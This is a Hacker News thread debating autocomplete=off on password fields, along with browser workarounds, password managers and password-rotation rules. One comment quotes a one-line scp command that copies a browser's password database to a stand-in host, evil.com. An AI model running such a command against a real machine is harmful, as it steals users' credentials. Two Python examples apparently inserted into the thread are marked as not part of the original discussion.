
The war against autocomplete=off (2013) - tshtf
http://blog.0xbadc0de.be/archives/124
======
talklittle
On Firefox:

1. Go to about:config

2. Right-click anywhere, New -> Boolean:

signon.overrideAutocomplete

Value: true

More info:
[https://bugzilla.mozilla.org/show_bug.cgi?id=425145](https://bugzilla.mozilla.org/show_bug.cgi?id=425145)

EDIT: Based on the milestone set on that issue, this setting requires Firefox
29. Another workaround is this bookmarklet:
[https://www.squarefree.com/bookmarklets/forms.html#remember_password](https://www.squarefree.com/bookmarklets/forms.html#remember_password)
referenced from comment
[https://bugzilla.mozilla.org/show_bug.cgi?id=425145#c16](https://bugzilla.mozilla.org/show_bug.cgi?id=425145#c16)

------
wyager
I've run into the problem of web services not letting me store passwords. The
reality is, if you let my password manager (safari jacks into OS X's keychain
system) keep track of things, I'm going to use the random 12-digit
alphanumeric password my password manager provides me. If you don't, I'm
either going to use my shitty "brain" password or put it in my password
manager anyway and just copy-paste it manually.

Thankfully, safari on both iOS and OS X has a toggle to ignore
autocomplete=off, which I take advantage of liberally.

~~~
rip747
[http://xkcd.com/936](http://xkcd.com/936)

~~~
wyager
A random 12-digit alphanumeric is log((26+26+10)^12)/log(2) = 71.45 bits of
entropy. Plenty for a web form.

------
stcredzero
My biggest problem is with sites that don't let me copy/paste into the
password field. WTF!? Who's the PHB that came up with this policy? _Despite_
this misguided nannying, I still use randomly generated 22 character
alphanumeric passwords, even if I have to open up the window in Keepass and
manually type them in. Most people aren't as paranoid and anal as me, however.
Whoever you are, you're basically encouraging people to use weak passwords.

Ironic, as it seems to be banks that are most often guilty of this.

~~~
lambeosaurus
Equally bad: requiring a user to _never use the same password twice_

_Come on_, I only forgot my password and want to set it to what I think it
should be! I didn't get hacked! Just let me live my life in peace!

~~~
aruggirello
Worse yet, there are banks that don't let you use _any of the last 3-5
passwords_. This is really annoying, especially when combined with enforcing a
password change every 3 or 6 months. But there is a solution: just use
whatever password you have chosen, and add a number for the current quarter or
semester. Until they come up with a password strength checker measuring the
similarity between your current and previous passwords (eg. levenshtein()),
you should be ok.

~~~
stcredzero
_Until they come up with a password strength checker measuring the similarity
between your current and previous passwords (eg. levenshtein()), you should be
ok._

These have appeared in Ubuntu.

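As an added example (not part of the thread, and not a copy of what any distribution ships), here is the kind of similarity check aruggirello says would defeat the "append the current quarter" trick: an edit-distance comparison against previous passwords, run at change time. The threshold, the history depth and the sample passwords are assumptions. The caveat a practitioner wants is in the docstring: this only works when the server has the old passwords in the clear at that moment (e.g. the user re-enters the current one), because a stored hash cannot be compared for similarity, only for equality.

```python
# Added example (not from the original thread): reject a new password that
# is a trivial edit of a previous one, so "Hunter2-Q1" -> "Hunter2-Q2" is
# caught even though the exact string differs. Threshold (max_ratio) and
# the sample passwords used in comments are assumptions for illustration.
from typing import List, Optional


def levenshtein(a: str, b: str) -> int:
    """Classic edit distance (insert / delete / substitute), O(len(a)*len(b))."""
    if len(a) < len(b):
        a, b = b, a
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1,                 # delete ca
                           cur[j - 1] + 1,              # insert cb
                           prev[j - 1] + (ca != cb)))   # substitute
        prev = cur
    return prev[-1]


def too_similar(new: str, old: str, max_ratio: float = 0.3) -> bool:
    """True if fewer than max_ratio of the characters changed.

    Comparison is case-insensitive so 'Password1' -> 'PASSWORD2' does not
    sneak through. The distance is normalised by the longer string.
    """
    a, b = new.lower(), old.lower()
    longest = max(len(a), len(b)) or 1
    return levenshtein(a, b) / longest < max_ratio


def check_new_password(new: str, history: List[str],
                       max_ratio: float = 0.3) -> Optional[str]:
    """Return a rejection reason, or None if the password is acceptable.

    `history` must hold previous passwords in plaintext, most recent first.
    In practice that means "the current password the user just re-typed":
    a server that keeps only hashes of old passwords can test equality
    against them but cannot measure similarity, which is why PAM-style
    checks compare the new password with the one entered during the change.
    """
    for i, old in enumerate(history):
        if new == old:
            return f"matches password #{i + 1} in history"
        if too_similar(new, old, max_ratio):
            return f"too similar to password #{i + 1} in history"
    return None
```

With a 30% threshold a ten-character password has to change at least three characters; tune `max_ratio` to the policy, and remember that the check sees the same plaintext the user just typed, nothing more.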
------
penguindev
> Please note that if you combine this policy and at the same time disable
> copy and paste into the password fields (I look at you, Blizzard!), I hate
> you.

oh man. disabling paste is the worst, because it breaks KeePassX. (Apple did
this last I checked!)

TurboTax did that as well last year; this year they made it sane again.
Luckily there's a Firefox about:config setting you can use to not let websites
hijack / block your clipboard events.

~~~
usea
Another way to bypass these fields where you can't paste a password (many
games are guilty of this atrocity): make an AutoHotkey[1] script for rapidly
typing whatever is in your clipboard.

This line will make ctrl-alt-v type your clipboard:

    ; AutoHotkey v1: ^ = Ctrl, ! = Alt. SendRaw types the clipboard text
    ; literally, so {} ^ ! + # in a password are not interpreted as keys.
    ^!v::SendRaw %clipboard%

[1] [http://www.autohotkey.com/](http://www.autohotkey.com/)

------
kybernetyk
The first thing I install in a new browser is an adblocker. The second thing
an addon that disables autocomplete=off.

Yes I'm lazy. But my laptop is encrypted and goes back to the login screen
after 2 minutes of inactivity. To me autocomplete=off is just annoying and
doesn't add any security.

~~~
taf2
it really helps with forms where you are an admin and can edit other users
information... in these forms when autocomplete is on... and starts populating
your information into the user you're trying to edit... well... things just
get pretty messed up...

------
brianpgordon
I just use this bookmarklet to remove "autocomplete=off" from form elements:

javascript:(function(){var%20c=0;function%20R(w){try{var%20a,df,dfe,i,j,x,y,r=1;df=w.document.forms;for(i=0;x=df[i];++i){dfe=x.elements;if(a=x.onsubmit){a=""}if(a=x.attributes["autocomplete"]){if(a.value=="on"){c++}a.value="on"}for(j=0;y=dfe[j];++j){if(a=y.attributes["autocomplete"]){if(a.value=="on"){c++}a.value="on"}}}}catch(E){r=0}return%20r}R(self);var%20i,x;for(i=0;x=frames[i];++i)R(x);if(c){alert("Found:%20"+c)}})();

~~~
yonran
There’s also the Chrome extension autocomplete=on from a Chromium author:
[https://chrome.google.com/webstore/detail/autocomplete-on/ecpgkdflcnofdbbkiggklcfmgbnbabhh](https://chrome.google.com/webstore/detail/autocomplete-on/ecpgkdflcnofdbbkiggklcfmgbnbabhh)

~~~
jonmetz
Shameless plug:

I got so worked up over this kind of nonsense one day that I wrote a Firefox
addon to turn autocomplete on.
[https://addons.mozilla.org/En-us/firefox/addon/autocompleteanywhere/](https://addons.mozilla.org/En-us/firefox/addon/autocompleteanywhere/)

------
choult
This drives some of our customers nuts because autocomplete has the annoying
tendency in the most recent Safari of overwriting prepopulated fields - users
end up losing configurations over this.

Otherwise I can see the benefit of ignoring the setting, perhaps, but we need
consistent default behavior (chance would be a fine thing!). I don't want to
be telling my customers that they should switch off autocomplete as a user
shouldn't need to configure a browser to use a website!

~~~
bdash
Have you filed a bug report about Safari overwriting prepopulated fields? If
not, and you don't want to deal with the painful experience that is
bugreport.apple.com, feel free to drop me an email with more details about
what you're seeing.

~~~
choult
I'll drop you a line on Monday when I can scrabble together something better
than swearing :P

------
205guy
The original article fails to take into account the larger population. The
basic password managers in browsers are huge security holes. The one in FF
does not use a master password by default, so anyone could look at an
unattended computer and see all stored passwords with a few clicks. The
article mentions an old JavaScript attack on the passwords as well (but then
dismisses the threat, since that one hole was patched).

So the problem really is that the browsers pushed insecure features out to the
masses, and many people adopted them. The number of people in the general
population who use a password manager is low (obviously it is high here on
HN). So think of the autocomplete=off flag as a flag to make sure you are
using a competent password manager, one that recognizes the problem and then
overrides the flag. Sounds like Safari and IE 11 are already doing that, so
hopefully they fixed the problems of the early password managers.

~~~
greggman
You might not agree with this but hear me out. I used to work on Chrome and I
was curious what the justification was for storing passwords unencrypted in
Chrome. I went and talked to the Chrome security team and they frustratingly
explained it to me as they get this question all the time.

As you said, in FF (and in Chrome), with a few clicks anyone could look at an
unattended computer and see all the stored passwords. As they pointed out, an
unlocked, unattended computer can pretty much be owned by anyone who wants to
own it. You've given them access to your computer. They can open a shell and
start running apps. They can exploit any bug in the OS or other app. They can
copy files to a USB stick or across the net. On top of that, your password
manager (or FF or Chrome) will let them log into your mail, your bank, your
facebook, whatever services you've saved passwords for, even without knowing
your password.

The point is

(1) don't leave your computer unlocked and unattended. Put a password on it;
when you walk away from the computer, lock the computer (start the screensaver
or whatever it is that requires you to use a password to get back in)

(2) don't ever let someone use your computer logged in as you. If you hand
someone your computer to use, log in as guest, then hand it to them.

If you're like me you'll probably reject these suggestions. I thought "I don't
want to be bothered to lock and unlock my computer all the time" and I thought
"It's stupid to expect me to put my computer in guest mode any time I let
someone else use it."

But, after I calmed down and thought about it I realized they are right. If
someone wants your passwords or other data and you hand them an unlocked
machine they are going to get them. How FF or Chrome or Password managers
store passwords has nothing to do with that.

~~~
czr80
Let me fix one line in your post: If someone _with sufficient technical
knowledge_ wants your passwords or other data and you hand them an unlocked
machine they are going to get them.

Now, reducing the technical knowledge required from "opening a shell and
running apps" to "click here to see all passwords in seconds" greatly reduces
the technical knowledge required and so greatly increases the risk you're
exposed to.

~~~
greggman
You're right. But, I'm guessing the set of people who know they could see your
password easily is pretty much the same set of people with sufficient
technical knowledge that they either know how to do more or know how to find
out how to do more.

Open a terminal, type

    scp .somebrowser/password.db user@evil.com:

Takes no more time than writing down passwords like nfie28447ncjf;$/$38342.
Probably less if there's more than one password.

------
michaelbehan
This article uses "password managers" ambiguously. In my opinion, a browser is
a terrible password manager because of what is stated in the "pros" section of
the article. My advice aligns with others who have replied here - get a real
password manager such as 1password and allow autocomplete="off" to do what it
is supposed to do.

~~~
claudius
Sorry, but which of the two points in the ‘pro’ section (storing truly
sensitive visible information and hacking of client-site databases) makes a
browser less capable of acting as a password manager than a ‘real’ password
manager?

Or maybe you could rephrase why you think browsers are terrible password
managers? I’m quite fond of Opera’s Wand.

~~~
dasil003
I'm going to go out on a limb and suggest it's just because 1Password is really,
really good. So good that I don't even want to try a browser's password
manager (especially since I want access to my passwords on multiple browsers
and my phone/tablet as well). I'm sure browser password managers have made
leaps and bounds, but so has 1Password, and it's amazing.

------
wglb
The issue may be moot--IE 11 ignores autocomplete=off.

And in any case, for the cases where this setting is effective, it doesn't
_break_ password managers--just set your password manager to not fill the
fields, but use copy and paste for the password.

[Edit - spelling]

~~~
zyxley
I think you mean "moot", not "mute".

~~~
wglb
Thanks, fixed.

------
joshuahedlund
> Tell me how I am supposed to fulfill these requirements if I need 20
> websites daily to do my work ?

One solution to this problem (or at least one way to severely mitigate it) is
to use a base word that you tweak with a simple algorithm based on the first
letter, last letter, number of letters in the domain, etc. Of course some
websites have mutually exclusive requirements, so this doesn't work for all
sites, but I've been doing this for so many years now that while I have muscle
memory for frequently used sites, I can go to a site I haven't been to in
years and have no memory of the actual characters in the password, but I apply
my algorithm and voila, it works!

~~~
ToastyMallows
I changed all my passwords recently to do the same thing. The problem I've
recently started to see is that, let's say for example my hashed+salted
password is stolen from a site. If they brute-force figure out what my
password is, they'll have my "base word" and all my other accounts may still
be able to be compromised.

Recently I changed my big accounts (Google, Facebook, StackOverflow) to have a
slightly different "base word" and the other accounts that I can afford to
lose control of have stayed the same.

~~~
smileysteve
It's significantly more difficult to reuse the base and figure out the
additional characters than it is to get access to the user whose password is
'password'

For insecure services that I use on mobile, public, etc computers, I do this.

------
pkulak
[https://chrome.google.com/webstore/detail/autocomplete-on/ecpgkdflcnofdbbkiggklcfmgbnbabhh](https://chrome.google.com/webstore/detail/autocomplete-on/ecpgkdflcnofdbbkiggklcfmgbnbabhh)

My favorite extension.

~~~
raldi
Doesn't work on Airbnb, though.

------
freehunter
I don't think I've run into a situation where LastPass has been unable to
auto-fill a form. Is this a feature of LastPass, or have I just not gone to
sites that disallow autocomplete?

~~~
pwman
LastPass has a setting to respect autocomplete -- it's off by default because
so many sites use it inappropriately.

------
yukichan
1password makes this never be an issue for me. ⌘+/ to log into anything with
one stroke, unless I have multiple accounts for the site, in which case it's a
couple of extra clicks.

~~~
wernercd
Same for KeePass (Ctrl + Alt + A). Never had an issue now that I use it
fairly consistently.

Key is I guess not using browser stores.

------
yaur
I'm going to go with Bruce Schneier on this one and say that there is
absolutely nothing wrong with writing your passwords down. If someone mugs me
and takes my wallet there is a 99% chance they are going to get the phone too
and I'll need to change all my passwords anyway.

Not letting the browser cache them is still dumb though.

------
malandrew
Could you not run an analysis of a user's password on account creation or
password reset that determines if it is likely to be autogenerated and managed
by a password manager. Then armed with this flag enable or disable
autocomplete on a user by user basis with javascript?

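An added example (not part of the thread) sketching malandrew's idea, using the same brute-force entropy arithmetic wyager gives upthread (log2 of alphabet size to the power of length; a 12-character alphanumeric comes out at 71.45 bits). The thresholds, the "three character classes" rule and the tiny word list are assumptions for illustration, not a published classifier: a real deployment would use a proper dictionary, would still misjudge some passwords (a long random all-lowercase string is not flagged here), and should treat the result as advisory when deciding whether to set autocomplete for a user. Note too that the check can only run where the server sees the plaintext, i.e. at account creation or password change.

```python
# Added example (not from the original thread): estimate a password's
# brute-force entropy and combine it with a dictionary check to guess
# whether it was machine-generated. Thresholds and COMMON_WORDS are
# assumptions; COMMON_WORDS is a constructed stand-in for a real word list.
import math
import string

# (character set, size of that set)
CHARSET_SIZES = (
    (string.ascii_lowercase, 26),
    (string.ascii_uppercase, 26),
    (string.digits, 10),
    (string.punctuation, len(string.punctuation)),  # 32 ASCII symbols
)

# Constructed, deliberately tiny word list; a real check needs a dictionary.
COMMON_WORDS = {"password", "welcome", "correct", "horse", "battery",
                "staple", "hunter", "dragon", "letmein"}


def _classes_present(pw: str):
    return [n for chars, n in CHARSET_SIZES if any(c in chars for c in pw)]


def charset_size(pw: str) -> int:
    """Size of the smallest 'standard' alphabet covering every character.

    Characters outside the four ASCII classes (space, non-ASCII) each widen
    the space by one, counted once per distinct character.
    """
    size = sum(_classes_present(pw))
    extra = {c for c in pw
             if not any(c in chars for chars, _ in CHARSET_SIZES)}
    return size + len(extra)


def brute_force_bits(pw: str) -> float:
    """Entropy assuming each character was drawn uniformly from the covering
    alphabet: len * log2(alphabet). wyager's 12-char alphanumeric gives
    12 * log2(62) = 71.45 bits. This is an upper bound; a human-chosen
    password is usually far weaker than this number suggests."""
    if not pw:
        return 0.0
    return len(pw) * math.log2(charset_size(pw))


def contains_dictionary_word(pw: str, words=COMMON_WORDS,
                             min_len: int = 4) -> bool:
    low = pw.lower()
    return any(w in low for w in words if len(w) >= min_len)


def looks_generated(pw: str, min_bits: float = 64.0) -> bool:
    """Heuristic: high brute-force entropy, at least three character classes
    and no dictionary word. Passphrases like 'correct horse battery staple'
    are deliberately not flagged: strong, but typed by a human."""
    return (brute_force_bits(pw) >= min_bits
            and len(_classes_present(pw)) >= 3
            and not contains_dictionary_word(pw))
```

The dictionary test is what keeps `Password1!` (65 bits by the naive formula, four classes) from being classified as generated; the entropy figure alone says nothing about how the string was chosen.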
------
SloopJon
Someone was showing me Capital One 360 (formerly ING), which uses an onscreen
PIN pad that you either have to click with your mouse, or type using a
randomly generated mapping. The idea is to thwart keystroke loggers, but it's
totally infuriating.

~~~
duskwuff
The worst part is, it doesn't even thwart keyloggers very well! It's not
uncommon for password stealing malware to detect when the user is viewing a
site that uses a "PIN pad" login of this type, and start taking screenshots
surrounding the location of each click to capture input.

------
shittyanalogy
How does it break password managers? Does it prevent them from auto-filling in
or auto-saving the password? I use passpack and enter/retrieve my credentials
manually and so don't experience this and appreciate autocomplete=off.

------
Sir_Cmpwn
Only slightly related, but I really wish GitHub would add autocomplete=off on
the language selection dropdown for Gist. If you make your own autocomplete
UI, I would prefer that you disable the browser UI.

------
matt-attack
I use:

[https://addons.mozilla.org/en-US/firefox/addon/remember-passwords/](https://addons.mozilla.org/en-US/firefox/addon/remember-passwords/)

It's heavenly.

------
raldi
Is it me, or is there no way to force Airbnb to allow Chrome to remember my
password, even with an extension?

------
gdulli
I used to use Chrome as my second browser, where I'd keep my work gmail
account up.

Recently it started to no longer save my password, even with an
autocomplete=on plugin installed that works on other sites. That was my
catalyst for uninstalling Chrome altogether and moving to Firefox for
everything.

------
JelteF
ChromeIPass (Keepass autofill for Chrome) just ignores this as far as I know.

------
badman_ting
Right, this isn't what autocomplete=off is for. It's for fields where
correcting the user's input to dictionary words is of negative utility, for
example, typing stock tickers should not correct "aapl" to "apple".

~~~
smackfu
Isn't that the "autocorrect" option?

~~~
badman_ting
Duhh, right you are. I keep conflating the two.

